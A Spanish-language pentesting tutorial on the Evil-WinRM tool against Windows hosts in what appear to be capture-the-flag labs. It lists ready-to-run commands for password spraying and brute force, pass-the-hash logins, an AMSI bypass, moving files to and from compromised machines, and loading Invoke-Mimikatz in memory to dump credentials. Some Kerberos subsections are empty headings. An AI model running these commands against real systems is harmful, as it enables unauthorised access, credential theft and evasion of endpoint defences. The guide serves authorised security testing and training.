Evil-WinRM

Introduction

WinRM es la implementación de Microsoft del protocolo WS-Management, muy habitual en entornos Windows, especialmente en sus versiones Server. Fue diseñado para facilitar la administración remota del sistema. Aunque en las estaciones de trabajo (Windows 7, 8, 8.1 o 10) no viene activado por defecto, en Windows Server suele estar habilitado en el puerto 5985.

Si cuentas con acceso al sistema —ya sea con usuario y contraseña, con el hash NTLM o incluso con un ticket TGT de Kerberos— puedes conectarte a este servicio y obtener una shell en el sistema. Esto es especialmente útil en la etapa de post-explotación, una vez que ya tienes cierto control sobre el entorno.

Aquí es donde entra Evil-WinRM, una de las herramientas más interesantes para explotar y gestionar conexiones a través de WinRM, permitiéndote realizar pruebas de post-explotación de manera eficaz y práctica.

Para instalar evil-winrm ejecutaremos el siguiente comando:

sudo gem install evil-winrm

Validating Access

Para verificar que disponemos de acceso para conectarnos a través de WinRM al equipo, podemos hacer uso de la herramienta nxc (NetExec) para validar dicho acceso. En el resultado nos debe aparecer con un + y con la palabra Pwn3d!. En caso contrario, solamente nos saldrá como -.

Ejemplo de acceso para conectarnos al equipo mediante WinRM.

❯ nxc winrm 10.10.10.10 -u 'user123' -p 'Password01!'
WINRM       10.10.10.10    5985   DC               [*] Windows 10 / Server 2019 Build 17763 (name:DC) (domain:dominio.htb)
WINRM       10.10.10.10    5985   DC               [+] dominio.htb\user123:Password01! (Pwn3d!)

Ejemplo de que no disponemos de acceso para conectarnos al equipo mediante WinRM.

❯ nxc winrm 10.10.10.10 -u 'user123' -p 'Password01!'
WINRM       10.10.10.10    5985   DC               [*] Windows 10 / Server 2019 Build 17763 (name:DC) (domain:dominio.htb)
WINRM       10.10.10.10    5985   DC               [-] dominio.htb\user123:Password01!

Autenticación usuario y contraseña

nxc winrm 10.10.10.10 -u 'user123' -p 'Password01!'

Autenticación realizando Pass-The-Hash (PtH) con el hash NTLM

nxc winrm 10.10.10.10 -u 'user123' -H 'E45A314C664D40A227F9540121D1A29D'

Password Spraying / Brute Force

ncx winrm 10.10.10.10 -u users.txt -p 'Password01!' --continue-on-success

nxc winrm 10.10.10.10 -u 'user1' -p passwords.txt --continue-on-success

nxc winrm 10.10.10.10 -u users.txt -p passwords.txt --continue-on-success

---

Authentication on WinRM

A continuación, se detallan como conectarnos mediante evil-winrm a un equipo que disponga WinRM expuesto.

Usuario y contraseña

evil-winrm -i 10.10.10.10 -u 'user' -p 'Password01!'

Usuario y contraseña + SSL

evil-winrm -i 10.10.10.10 -u 'user' -p 'Password01!' -S

Usuario y hash NTLM [Pass-The-Hash (PtH)]

evil-winrm -i 10.10.10.10 -u 'user' -H 'E45A314C664D40A227F9540121D1A29D'

Autenticación con key (.pem)

evil-winrm -i 10.10.10.10 -c certificate.pem -k priv-key.pem -S

Kerberos

La autenticación mediante Kerberos requiere de una serie de pasos previos para que funcione correctamente.

• Sincronizar la hora de la máquina local con la del Domain Controller.

• Disponer de un TGT (Ticket Granting Ticket)

• Exportar el TGT en la variable KRB5CCNAME

• Disponer de la instalación de krb5-user y krb5-config en el equipo local

• Configurar adecuadamente el archivo /etc/krb5.conf con la configuración necesaria del dominio

• Configurar correctamente el archivo /etc/hosts para la resolución de nombres.

El comando para conectarnos mediante el TGT obtenido es el siguiente:

evil-winrm -i dc.dominio.htb -r dominio.htb

Para configurar paso a paso esta autenticación al WinRM mediante Kerberos, realizaremos los siguientes pasos:

Sincronizar hora

Deberemos de sincronizar la hora de nuestro equipo con la del DC (Domain Controller).

Instalaremos el paquete de ntpdate para ayudarnos a sincronizar la hora de nuestro reloj.

sudo apt install ntpdate -y

Una vez instalado, sincronizaremos nuestra hora con la del DC.

sudo ntpdate -s 10.10.10.10

Disponer TGT

KRB5CCNAME

Paquetes

/etc/krb5.conf

/etc/hosts

---

Help Menu

---

Menu Functions

Bypass AMSI

La herramienta de evil-winrm dispone de un módulo para realizar un Bypass de la AMSI para lograr ejecutar nuestro código malicioso.

Bypass-4MSI

---

Service Enumeration

A veces, las herramientas de enumeración en post-explotación no logran identificar el nombre del servicio activo en el sistema objetivo. En esos casos, evil-winrm resulta muy útil, ya que permite ver una lista completa de los servicios en ejecución desde su menú, específicamente a través de la opción de services. Esto es especialmente valioso para detectar servicios sin comillas, que otras herramientas podrían pasar por alto.

services

---

Upload Transfer

Evil-WinRM cuenta con un módulo que te permite subir archivos desde el directorio actual de tu sesión directamente al sistema comprometido.

Esto facilita la transferencia de herramientas, scripts u otros recursos necesarios para continuar con tus actividades de post-explotación de manera sencilla y directa.

upload <archivo>

---

Download Transfer

Evil-WinRM también te permite extraer archivos del sistema comprometido hacia tu máquina local. Simplemente, estando en el directorio deseado, utiliza el comando:

Esto resulta muy práctico para recolectar información o respaldar archivos importantes durante la fase de post-explotación.

download </ruta/archivo>

Loading PowerShell Script

Evil-winrm ofrece una funcionalidad que permite cargar scripts directamente desde nuestra máquina local. Usando la opción -s seguida de la ruta del script, podemos inyectarlo en memoria en el sistema objetivo. Además, cuenta con una capacidad para omitir AMSI, lo que resulta fundamental antes de importar cualquier script.

En el ejemplo que se muestra, primero se desactiva AMSI y luego se carga el script Invoke-Mimikatz.ps1 en la memoria del sistema comprometido, lo que nos permite ejecutar comandos de mimikatz. Con este método, por ejemplo, podemos volcar las credenciales en caché y, posteriormente, utilizar el hash NTLM obtenido para realizar un ataque de Pass-The-Hash (PtH).

evil-winrm -i 10.99.99.10 -u 'Administrador' -H '027ae3139c0b6e47d3825660c1ede923' -s /opt/nishang/Gather/

Bypass-4MSI

Invoke-Mimikatz.ps1

Invoke-Mimikatz

Store logs with Evil-winrm

Esta función te permite guardar registros de tus sesiones remotas en tu máquina local durante la fase de enumeración. En escenarios como CTF o pruebas internas de penetración, es esencial contar con un historial para la elaboración de informes. Evil-winrm incorpora la opción -l, que al incluirla en la sesión, almacena automáticamente todos los logs en el directorio /root/evil-winrm-logs de tu máquina base, etiquetados con la fecha y la IP del objetivo. Por ejemplo, si ejecutas el comando ipconfig durante una sesión, la salida se registrará localmente, facilitándote la referencia posterior.

evil-winrm -i 10.99.99.10 -u 'Administrador' -H '027ae3139c0b6e47d3825660c1ede923' -l

Podemos corroborarlo revisando los registros almacenados; notarás que se capturó una imagen de la terminal en el instante en el que ejecutamos el comando ipconfig.

---

References

A Detailed Guide on Evil-WinrmHacking Articles

Evil-WinRM: Shell sobre WinRM para pentesting en sistemas Windows - Parte 1 de 2 - The Hacker WayThe Hacker Way

Evil-WinRM: Shell sobre WinRM para pentesting en sistemas Windows – Parte 2 de 2 - The Hacker WayThe Hacker Way